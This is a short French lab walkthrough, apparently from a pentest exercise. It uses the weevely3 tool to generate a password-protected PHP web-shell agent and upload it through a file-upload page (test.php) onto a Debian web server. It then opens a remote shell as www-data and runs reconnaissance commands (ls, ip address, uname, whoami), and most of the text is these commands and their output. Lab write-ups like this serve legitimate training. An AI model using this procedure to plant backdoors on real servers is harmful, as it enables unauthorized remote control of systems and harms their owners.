weevely3
Sur la KALI02, nous avons téléchargé weevely3, la version 4.0.1.
git clone https://github.com/epinna/weevely3.git
Ensuite nous nous rendons dans le dossier précedemment téléchargé et nous générons un fichier agent
weevely generate MON_PASSWORD_TRES_TRES_SECURE! agent.php
Nous avons ainsi le fichier agent.php qui est créé. Nous le dropons sur la page test.php
Sélectionner le fichier
Envoyer le fichier
Un message de confirmation apparaît
Nous avons maintenant implanté le fichier agent que nous pouvons exploité avec weevely.
weevely https://172.19.110.126/agent.php MON_PASSWORD_TRES_TRES_SECURE!
[+] weevely 4.0.1
[+] Target: www-data@INFRA01:/var/www/html
[+] Session: /home/kali02/.weevely/sessions/172.19.110.126/agent_1.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>
Nous allons maintenant voir si notre implant fonctionne
weevely> ls
access.log
agent.php
error.log
favicon.ico
index.html
index.nginx-debian.html
pageweb
test.php
www-data@INFRA01:/var/www/html $ pwd
/var/www/html
www-data@INFRA01:/var/www/html $ ip address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:0c:29:ad:cf:c0 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.3.2/24 brd 192.168.3.255 scope global dynamic noprefixroute ens192
valid_lft 2855sec preferred_lft 2855sec
inet6 fe80::20c:29ff:fead:cfc0/64 scope link noprefixroute
valid_lft forever preferred_lft forever
www-data@INFRA01:/var/www/html $ uname -a
Linux INFRA01 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64 GNU/Linux
www-data@INFRA01:/var/www/html $ whoami
www-data